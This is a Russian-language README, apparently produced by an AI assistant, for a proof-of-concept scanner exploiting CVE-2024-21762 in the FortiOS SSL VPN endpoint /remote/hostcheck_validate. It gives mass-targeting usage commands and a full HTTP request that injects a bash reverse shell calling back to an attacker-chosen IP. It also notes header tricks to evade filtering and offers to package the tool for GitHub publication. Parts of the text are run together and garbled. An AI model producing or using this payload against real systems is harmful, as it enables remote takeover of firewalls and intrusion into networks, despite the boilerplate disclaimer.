
Сканер proof-of-concept, нацеленный на CVE-2024-21762 в конечной точке /remote/hostcheck_validate SSL VPN FortiOS, с доставкой полезной нагрузки обратной оболочки.
Сканер для проверки концепции (PoC), нацеленный на CVE-2024-21762 в конечной точке /remote/hostcheck_validate SSL VPN FortiOS, с доставкой полезной нагрузки обратной оболочки (reverse shell).
Вот запись в стиле GitHub для вашего проекта, включая чистую и краткую сводку, руководство по использованию и контекст того, как это соотносится с CVE.
CVE-2024-21762 FortiOS HostCheck PoC ScannerСканер для проверки концепции (PoC), нацеленный на CVE-2024-21762 в конечной точке
/remote/hostcheck_validateSSL VPN FortiOS, с доставкой полезной нагрузки обратной оболочки (reverse shell).
Этот скрипт на Python — инструмент для проверки концепции (PoC), предназначенный для взаимодействия с интерфейсом SSL VPN Fortinet FortiOS, нацеленный на CVE-2024-21762 — переполнение буфера в стеке или внедрение команд в конечной точке /remote/hostcheck_validate.
Предупреждение: Это предназначено только для образовательных целей и разрешённого тестирования.
/remote/hostcheck_validate на интерфейсе SSL VPN FortiGate.host).User-Agent, Cookie) для обхода поверхностной фильтрации запросов FortiOS.last_response.txt)tqdm для визуализации прогрессаУстановка зависимостей:
pip install tqdm
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
targets.txt: Список целей в формате IP:PORT, по одной на строкуresults.txt: Файл журнала попыток эксплуатацииPOST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
Инструмент записывает полный HTTP-ответ каждой попытки в:
last_response.txt
Используйте это для проверки, был ли запрос обработан, отклонён или возвращён код ошибки.
Этот код предоставляется только для образовательных целей и разрешённого тестирования. Не используйте его в сетях или системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
Carter — инженер по кибербезопасности, энтузиаст Red/Purple Team, фанат автоматизации PoC.
Хотите, чтобы это было упаковано в файл README.md + структура репозитория, готовые к публикации на GitHub? Я могу сгенерировать это дальше.